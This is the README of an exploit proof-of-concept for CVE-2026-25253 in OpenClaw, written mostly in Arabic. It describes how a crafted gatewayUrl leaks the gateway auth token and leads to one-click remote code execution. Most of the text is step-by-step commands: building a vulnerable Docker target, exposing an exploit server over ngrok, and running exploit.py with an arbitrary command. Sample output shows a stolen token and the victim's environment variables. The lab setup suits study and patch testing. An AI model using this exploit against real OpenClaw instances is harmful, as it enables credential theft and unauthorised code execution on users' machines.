
إثبات مفهوم استغلال لـ CVE-2026-25253 في OpenClaw: يقوم gatewayUrl مُصمَّم خصيصًا بتسريب رمز بوابة Control UI، مما يتيح وصولًا غير مصرح به إلى البوابة وتنفيذ تعليمات برمجية عن بُعد بنقرة واحدة.
★ CVE-2026-25253 OpenClaw 1-Click Remote Code Execution PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : ثغرة تسريب رمز المصادقة في OpenClaw
الوصف: يسمح OpenClaw (المعروف أيضًا باسم clawdbot أو Moltbot) قبل الإصدار v2026.1.29 للمهاجمين بتسريب رمز مصادقة البوابة المخزَّن عبر تمرير قيمة سلسلة استعلام gatewayUrl مُصمَّمة خصيصًا إلى واجهة التحكم (Control UI)، والتي تُنشئ تلقائيًا اتصال WebSocket دون التحقق أو تأكيد المستخدم. قد يؤدي ذلك إلى وصول غير مصرَّح به إلى البوابة وتنفيذ تعليمات برمجية عن بُعد بنقرة واحدة.
Dockerfile — لبناء بيئة OpenClaw المصابة بالثغرةtemplates/ — صفحات الويب الخبيثة المستخدمة في الاستغلالconfig.txt — إعدادات OpenClaw المستخدمة في بيئة الضحيةexploit.py — خادم الاستغلالrequirements.txt — متطلبات PoCdocker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66config.txtpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
مثال:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
ننشر تحليلاً لثغرات CVE والبرمجيات الخبيثة مرة كل شهر. إذا كنت مهتمًا، يُرجى متابعة الروابط أدناه للاطلاع على منشوراتنا.